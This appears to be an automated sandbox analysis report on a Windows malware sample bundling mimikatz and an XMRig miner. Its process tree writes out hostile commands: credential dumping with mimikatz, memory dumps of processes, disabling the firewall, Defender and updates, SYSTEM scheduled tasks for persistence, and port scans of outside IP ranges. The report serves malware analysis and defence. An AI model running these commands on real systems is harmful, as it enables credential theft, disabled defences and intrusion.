Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2025 00:25

General

  • Target

    2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe

  • Size

    9.6MB

  • MD5

    9d241c60a3e00cbbbababbae0c9db9fa

  • SHA1

    eda89b9a731bb4837ebe06a3cead86ff2abd3596

  • SHA256

    1642bf175e9f011608fe9086da7e939f72e025e2f00d75af8b2b83f35edb47c0

  • SHA512

    33157bf2d8945da7115d1701dbd84165562957ec6b19ae0cbb34e93cfe9f9d72cfd55d1c762b2c40942636029f86aaf07ace5eeba5a082a3ab005431c3a98872

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30107) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 35 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2148
      • C:\Windows\TEMP\dvfzrticv\lfbpkn.exe
        "C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2268
    • C:\Users\Admin\AppData\Local\Temp\2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\cbdnbivt\tmyfwky.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:920
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3496
        • C:\Windows\cbdnbivt\tmyfwky.exe
          C:\Windows\cbdnbivt\tmyfwky.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:5032
    • C:\Windows\cbdnbivt\tmyfwky.exe
      C:\Windows\cbdnbivt\tmyfwky.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4356
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1880
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2432
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:216
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4504
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4376
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
              PID:1500
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4048
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4144
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4708
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4392
            • C:\Windows\itcctjlje\unptrtjvi\wpcap.exe
              C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2580
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3456
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:444
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1980
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4428
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3336
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1992
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1960
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:404
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
              PID:2536
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                  PID:3036
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2248
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2012
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4880
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                      PID:2500
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:956
                  • C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe
                    C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:4640
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\itcctjlje\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  PID:3220
                  • C:\Windows\itcctjlje\Corporate\vfshost.exe
                    C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2652
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:5008
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                      PID:940
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:2004
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4612
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3080
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:2976
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:420
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                        PID:748
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:1400
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3844
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2132
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3044
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1628
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4420
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2268
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3432
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4732
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1324
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:452
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3620
                    • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                      C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 780 C:\Windows\TEMP\itcctjlje\780.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4800
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2432
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop SharedAccess
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2472
                      • C:\Windows\SysWOW64\net.exe
                        net stop SharedAccess
                        3⤵
                          PID:1692
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop SharedAccess
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:3976
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh firewall set opmode mode=disable
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4500
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall set opmode mode=disable
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:2736
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh Advfirewall set allprofiles state off
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:4708
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh Advfirewall set allprofiles state off
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:2940
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop MpsSvc
                        2⤵
                          PID:724
                          • C:\Windows\SysWOW64\net.exe
                            net stop MpsSvc
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:224
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop MpsSvc
                              4⤵
                                PID:3952
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop WinDefend
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4588
                            • C:\Windows\SysWOW64\net.exe
                              net stop WinDefend
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1556
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop WinDefend
                                4⤵
                                  PID:3028
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop wuauserv
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:1400
                              • C:\Windows\SysWOW64\net.exe
                                net stop wuauserv
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:5024
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  4⤵
                                    PID:4232
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config MpsSvc start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2832
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config MpsSvc start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  PID:2484
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config SharedAccess start= disabled
                                2⤵
                                  PID:4520
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config SharedAccess start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:1604
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config WinDefend start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1804
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WinDefend start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:4644
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config wuauserv start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1344
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config wuauserv start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    PID:2196
                                • C:\Windows\TEMP\xohudmc.exe
                                  C:\Windows\TEMP\xohudmc.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2016
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 64 C:\Windows\TEMP\itcctjlje\64.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2580
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2148 C:\Windows\TEMP\itcctjlje\2148.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4832
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2740 C:\Windows\TEMP\itcctjlje\2740.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3960
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2792 C:\Windows\TEMP\itcctjlje\2792.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3240
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2260 C:\Windows\TEMP\itcctjlje\2260.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3784
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 1284 C:\Windows\TEMP\itcctjlje\1284.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2364
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3772 C:\Windows\TEMP\itcctjlje\3772.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4736
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3860 C:\Windows\TEMP\itcctjlje\3860.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2004
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3932 C:\Windows\TEMP\itcctjlje\3932.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1384
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 4056 C:\Windows\TEMP\itcctjlje\4056.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5084
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 1936 C:\Windows\TEMP\itcctjlje\1936.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3836
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 2360 C:\Windows\TEMP\itcctjlje\2360.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2984
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 5088 C:\Windows\TEMP\itcctjlje\5088.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4548
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3120 C:\Windows\TEMP\itcctjlje\3120.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4368
                                • C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe
                                  C:\Windows\TEMP\itcctjlje\cmzbnyytn.exe -accepteula -mp 3956 C:\Windows\TEMP\itcctjlje\3956.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2024
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c C:\Windows\itcctjlje\unptrtjvi\scan.bat
                                  2⤵
                                    PID:884
                                    • C:\Windows\itcctjlje\unptrtjvi\midctcinn.exe
                                      midctcinn.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                      3⤵
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      PID:4604
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:832
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2396
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4712
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                        PID:3328
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:452
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                          PID:5584
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5684
                                    • C:\Windows\SysWOW64\gyggue.exe
                                      C:\Windows\SysWOW64\gyggue.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1172
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F
                                      1⤵
                                        PID:2400
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          2⤵
                                            PID:4048
                                          • C:\Windows\system32\cacls.exe
                                            cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F
                                            2⤵
                                              PID:4504
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F
                                            1⤵
                                              PID:3300
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                2⤵
                                                  PID:1700
                                                • C:\Windows\system32\cacls.exe
                                                  cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F
                                                  2⤵
                                                    PID:4276
                                                • C:\Windows\system32\cmd.EXE
                                                  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tmyfwky.exe
                                                  1⤵
                                                    PID:2472
                                                    • C:\Windows\ime\tmyfwky.exe
                                                      C:\Windows\ime\tmyfwky.exe
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1188
                                                  • C:\Windows\system32\cmd.EXE
                                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F
                                                    1⤵
                                                      PID:3496
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        2⤵
